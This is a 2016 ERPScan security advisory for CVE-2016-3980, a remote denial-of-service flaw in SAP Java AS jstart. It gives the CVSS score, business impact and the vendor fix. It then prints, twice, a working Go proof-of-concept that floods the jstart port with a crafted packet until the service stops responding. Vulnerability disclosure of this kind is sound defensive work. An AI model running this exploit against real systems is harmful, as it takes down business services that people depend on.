ERPScanERPSCAN-16-018SAP JAVA AS jstart - DoS vulnerability
0.002 Low
EPSS
Percentile
59.9%
Application: SAP JAVA AS **Versions Affected:**SAP JAVA AS 7.2 – 7.4 Vendor URL:SAP **Bugs:**Denial of Service **Reported:**04.12.2015 **Vendor response:**05.12.2015 **Date of Public Advisory:**14.03.2016 **Reference:**SAP Security Note 2259547 Author: Dmitry Yudin (ERPScan) @ret5et
Vulnerability Information
Class: denial of service
Impact: denial of service
Remotely Exploitable: Yes
Locally Exploitable: No
CVE: CVE-2016-3980
CVSS Information
CVSS Base Score v3: 7.5 / 10
CVSS Base Vector:
| AV: Attack Vector (Related exploit range) | Network (N) |
|---|---|
| AC: Attack Complexity (Required attack complexity) | Low (L) |
| PR: Privileges Required (Level of privileges needed to exploit) | None (N) |
| UI: User Interaction (Required user participation) | None (N) |
| S: Scope (Change in scope due to impact caused to components beyond the vulnerable component) | Unchanged (U) |
| C: Impact to Confidentiality | None (N) |
| I: Impact to Integrity | None (N) |
| A: Impact to Availability | High (H) |
Description
The Java Startup Framework (jstart) in SAP JAVA AS 7.4 allows remote attackers to cause a denial of service via a crafted HTTP request.
Business risk
A denial of service vulnerability can terminate a process of the vulnerable component. As a result, nobody can use this service, which has a negative influence on business processes. System downtime also harms business reputation.
VULNERABLE PACKAGES
SAP NetWeaver AS JAVA 7.2- 7.4
Other versions are probably affected too, but they were not checked.
SOLUTIONS AND WORKAROUNDS
To correct this vulnerability, install SAP Security Note 2259547
TECHNICAL DESCRIPTION
Anonymous attacker can use a special HTTP request to cause denial of service in SAP AS JAVA.
Proof of Concept
package main import ( “net” “fmt” _ “encoding/hex” “sync” “flag” ) //Globals var wg sync.WaitGroup func dos (constr string) { defer wg.Done() var data = “\x00\x00\x00\x1cNI_RTERR\x00y\x04\x00\x00ASD\x00\x00\x00\x04DAAAAAAA” //resp := make([]byte, 1024) for { conn, err := net.Dial(“tcp”, constr) if err != nil { fmt.Print(“Server is not responding… \n”) return } fmt.Fprintf(conn,data) //conn.Read(resp) } } func main () { var port = flag.String(“port”, “0”, “jstart tcp port”) var ip = flag.String(“ip”, SAP_IP, “ip”) flag.Parse() constr := fmt.Sprintf(“%s:%s”,ip,port) for i := 0; i < 2; i++ { go dos(constr) wg.Add(1) } fmt.Println(“Whaiting …”) fmt.Println("jstart - DoS Vuln(race condition) - port 64* … ") wg.Wait() fmt.Println(“Done”) }
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
|
package main
import (
“net”
“fmt”
_ “encoding/hex”
“sync”
“flag”
)
//Globals
var wg sync.WaitGroup
func dos (constr string) {
defer wg.Done()
var data = “\x00\x00\x00\x1cNI_RTERR\x00y\x04\x00\x00ASD\x00\x00\x00\x04DAAAAAAA”
//resp := make([]byte, 1024)
for {
conn, err := net.Dial(“tcp”, constr)
if err != nil {
fmt.Print(“Server is not responding… \n”)
return
}
fmt.Fprintf(conn,data)
//conn.Read(resp)
}
}
func main () {
var port = flag.String(“port”, “0”, “jstart tcp port”)
var ip = flag.String(“ip”, SAP_IP, “ip”)
flag.Parse()
constr := fmt.Sprintf(“%s:%s”,*ip,*port)
for i := 0; i < 2; i++ {
go dos(constr)
wg.Add(1)
}
fmt.Println(“Whaiting …”)
fmt.Println("jstart - DoS Vuln(race condition) - port 64*** … ")
wg.Wait()
fmt.Println(“Done”)
}
—|—
Related
